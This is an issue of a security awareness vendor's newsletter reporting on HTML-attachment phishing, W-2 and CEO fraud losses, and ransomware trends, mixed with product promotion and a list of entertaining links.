CyberheistNews Vol 6 #19 Scam Of The Week: Hidden Dangers Of HTML Attachments

The last six to nine months, we have seen a lot of .DOC and .JS file attachments as malicious attachments used for mainly ransomware attacks.

However, our researchers have spotted an up & coming trend; malicious HTML "attackments" that are used for credentials phishing. There are a few reasons why the bad guys have taken a liking to HTML:

1. Reduced chance of antivirus detection
2. Users are familiar with this, and do not see harm

Bad guys are using .HTML attachments to spoof bank login pages, popular online services, and secure messages from financial institutions.

Inevitably, your filters are going to miss some of these, and I suggest you send the following to your employees as part of your ongoing awareness campaign:

Internet criminals never stop trying to get past our spam filters and trick you into clicking on phishing links or opening malicious email attachments.

This is a warning against a new type of attack that uses an HTML attachment which tries to scam you into entering your user name and password.

HTML attachments are often used by banks for secure messages, so you might think that these are always safe. They are NOT. If you get an email with an HTML attachment, be just as careful as always and do not open it unless you have asked for it, or have verified with the sender that the attachment is legit.

Remember: Always Think Before You Click!

We have a new blog post with lots more detail, background, examples and screenshots here:
https://blog.knowbe4.com/the-hidden-dangers-of-.html-attachments

Ex-Gartner IT Security Analyst Ben Tomhave calls himself an infosec obsessive and I admire his insightful analyses when they appear. This time he commented on the recent attacks that followed the Verizon Data Breach reports.

His blog post is an excellent perspective on the current state of security and he broke it apart in three sections. The first is about the woes of patching and he nails it. The second is about people and I'll quote him here:

"The second major theme from DBIR and myriad other reports is that people continue to be the weakest link in security models. Now, this is for a number of reasons, most of which revolve around the fact that we give them easily exploited systems and then somehow expect them to magically protect these vulnerable boxs without any tools for self-defense.

"So, ultimately, as infosec and IT professionals, it's our fault that people suck, because we're making them suck. Think about that the next time you want to mutter "stupid users" over the latest compromise.

"Beyond the fundamental failures of expecting people to not get pwnd in a vulnerable environment, there are other things that can and should be done. Doing security awareness in the traditional, stupid, CBT-driven way is not it. Instead, we need to do a far better job engaging our target audience and embed practices and awareness into their DNA.

"You cannot do this in one standard cookie cutter manner, but instead must invest in more progressive methods."

I could not agree more. I have worked very hard these last five years to provide you with a platform you can use to better manage the problem of social engineering and is also easy, affordable and fun to use. Check all the features here:
https://www.knowbe4.com/security-awareness-training-2016-features/

The third part of Tomhave's analysis relates to the controversy about the source data used for the Verizon report, and is very entertaining just by itself. Warmly Recommended!
http://www.secureconsulting.net/2016/05/dbir-2016-lots-of-noise-and-dr.html

Brunswick Corp. reported on May 3 that it was victimized by a spear phishing scam that netted the W-2 information for possibly all 13,000 current and former company employees.

On April 29, 2016 a Brunswick employee responded to what was thought to be a legitimate email from management requesting the W-2 information. In fact, the data was sent to an unknown and unauthorized and individual.

Brunswick noted "that this was not a technical intrusion of its information systems, but rather a criminal scam that plays on human nature."

I just learned that this type of data loss costs about $300 per employee in combined legal fees and buying identity theft protection. Do the math, that is 3,900,000 dollars in damage. Compare that to just 7.50 per employee per year for Platinum Level security awareness training at that volume discount level. You just saved a whopping 3,802,500 budget dollars and you're the IT superhero.

The Alpha Payroll company fired an employee who fell for a W-2 phishing scam. This CEO Fraud attack compromised all of the 2015 W-2 records produced by the firm for their clients. Steve Ragan has the story at CSO, it is an interesting read and a more interesting discussion. Here is the link to the story:
http://www.csoonline.com/article/3064675/security/alpha-payroll-fires-employee-victimized-by-w-2-phishing-scam.html

I'd like your opinion on this and I created a super simple 2-question survey that you can use to give me your feedback. Should someone who falls for a W-2 phishing attack be fired? In the next issue I will report back what you told me!
https://www.surveymonkey.com/r/W-2fired

Today, your employees are frequently exposed to sophisticated phishing and ransomware attacks. Old-school security awareness training doesn’t hack it anymore. More than ever, your users are the weak link in your network security.

Join us tomorrow Wednesday, May 11 at 2:00 p.m. (EDT) for a 30-minute live product demonstration of the innovative Kevin Mitnick Security Awareness Training Platform to see the latest features and how easy it is to train and phish your users:

• Send Phishing Security Tests to your users and get your Phish-prone percentage.
• Roll out Training Campaigns for all users (or groups) with follow-up emails to “nudge” incomplete users, as well as point-of-failure training auto-enrollment.
• NEW EZXploit™ patent-pending functionality that allows an internal, fully automated "human pentest”.
• NEW USB Drive Test™ allows you to test your user’s reactions to unknown USBs they find.
• Advanced Reporting to watch your Phish-prone percentage drop, with great ROI.

PS: If we have time we'll show you the new Browser Plugin Vulnerability Detection we just added last week!

Find out how thousands of organizations have mobilized their end-users as their first line of defense: Register Now:
https://attendee.gotowebinar.com/register/6490307561967355137

"The truth is like a lion. You don't have to defend it. Let it loose. It will defend itself."
- St. Augustine

"The future belongs to those who believe in the beauty of their dreams."
- Eleanor Roosevelt

Thanks for reading CyberheistNews

An employee at a Troy, Mich., investment firm fell for a CEO Fraud attack and was social engineered into transferring 495K to a Hong Kong bank. The error was noticed eight days after it took place, so the money is long gone.

They have reported it to their insurer, but very often this type of CEO Fraud is not covered, even when you have a specific cyber insurance policy, because no hardware or software was hacked. It was the human that was hacked instead.

The Troy police department said that Pomeroy Investment Corp. filed a report on April 18 stating a staffer had sent 495,000 dollars overseas to China after receiving an email request purportedly from a company executive, according to The Detroit News.

A story in SCMagazine quoted the Troy Police Sgt. Meghan Lehman who said: “Previously, it was typical for company employees to communicate by email and to make transfers of funds — even overseas, but in this case, someone hacked the account of the sender requesting the funds. And then it was days later before anyone questioned the transaction and learned they had been hacked.”

In a case of "barn-horse" Pomeroy Investment Corp has changed their security policies related to making wire transfers only after receiving an email.

If they just would have had the first layer of defense-in-depth deployed, meaning security policy in place, security procedure followed, and stepped their employees through effective security awareness training, this 500K loss would have been prevented. More about defense-in-depth:
https://blog.knowbe4.com/defense-in-depth-your-answer-to-social-engineering

The Samsung Business Insights has a good post about ransomware which locks whole devices and wants Apple iTunes gift cards to unlock the phone:

"Ransomware is a type of malware that aims to deny access to computing devices and the data they contain until some form of a ransom has been paid. While many forms of ransomware encrypt data on devices to prevent access, there are also forms that merely lock devices.

Dogspectus, which was discovered in April 2016 by Blue Coat Labs, is an example of the second type. It infects devices without requiring any form of user interaction, rendering the device inaccessible within 10 seconds by taking advantage of several vulnerabilities in older versions of Android.

The Dogspectus ransomware then displays a demand for the user to pay a ransom in the form of two $100 Apple iTunes gift cards in order for the device to be unlocked."

More details how to get around this at the Samsung blog:
https://insights.samsung.com/2016/05/04/dogspectus-new-stealthier-ransomware/

Attackers wielding ransomware are not always using phishing and malvertising that uses social engineering tricks to get users to open attachments. They are also targeting you through an often-found hole in your corporate network; Internet facing, poorly secured remote desktop servers.

According to Wouter Jansen, Senior Forensic IT Expert at Fox-IT, the company has lately been called by a number of firms that have been hit with ransomware, and a subset of those have let attackers and ransomware in through that channel.

“Entries in the log files show the attackers got access to the servers by brute forcing usernames and passwords on remote desktop servers that are accessible from the internet. Day in, day out, failed login attempts are recorded coming from hundreds of unique IP-addresses trying hundreds of unique usernames,” Jansen noted. More at their blog:
https://blog.fox-it.com/2016/05/02/ransomware-deployments-after-brute-force-rdp-attack/

They said: "We are excited to announce the May issue of OUCH! This month, led by the infamous James Lyne, we focus on the Internet of Things (IoT). Specifically, we discuss what IoT is, how IoT impacts our personal lives, and what we can do to protect IoT devices. As such, we ask you share OUCH! with your family, friends, and coworkers." English Version (PDF)
https://securingthehuman.sans.org/newsletters/ouch/issues/OUCH-201605_en.pdf

• Prince Death Overdose Caught On Video! Stolen out of a spear phishing attack?
  https://blog.knowbe4.com/prince-death-overdose-caught-on-video-stolen-out-of-a-spear-phishing-attack

• This amazing kite grabbed everyone's attention at the Shihmen International Kite Festival in Taipei City:
  http://www.flixxy.com/bicycle-kite.htm?utm_source=4

• With incredible reflexes and coordination, R/C pilot Tareq Alsaadi can make his helicopter perform maneuvers that were previously considered impossible:
  http://www.flixxy.com/master-rc-helicopter-pilot.htm?utm_source=4

• Guinness World Record On Jet-Powered Hoverboard By Franky Zapata. I want one!!
  http://www.flixxy.com/guinness-world-record-on-jet-powered-hoverboard-by-franky-zapata.htm?utm_source=4

• Lara Jacobs has found the perfect equilibrium with her exquisite balancing act at the French TV show 'The World's Greatest Cabaret.':
  http://www.flixxy.com/the-balance-goddess-lara-jacobs-the-worlds-greatest-cabaret.htm?utm_source=4

• From the "Weird Japanese Department". Magician sets a new world record by doing 50 magic tricks in 4 minutes on the 1988 TV show 'Incredible Sunday.':
  http://www.flixxy.com/50-magic-tricks-in-4-minutes.htm?utm_source=4

• Single-propeller 'drone' flies when you throw it like a frisbee:
  http://mashable.com/2016/05/06/monospinner-single-propeller-drone/#Yr7ge5jPbSqh

• Foot puppeteer Anne Klinge stuns the judges and audience of Britain's Got Talent 2016 with her unusual performance. This is weird and super funny:
  http://www.flixxy.com/perfection-with-hand-and-feet-anne-klinge-britains-got-talent-2016.htm?utm_source=4

• How to fake a fingerprint and break into a phone:
  https://www.youtube.com/watch?v=tj2Ty7WkGqk

• How Can I See If My Users Have Vulnerable Browser Plugins Installed?
  https://blog.knowbe4.com/new-knowbe4-feature-vulnerable-browser-plugin-detection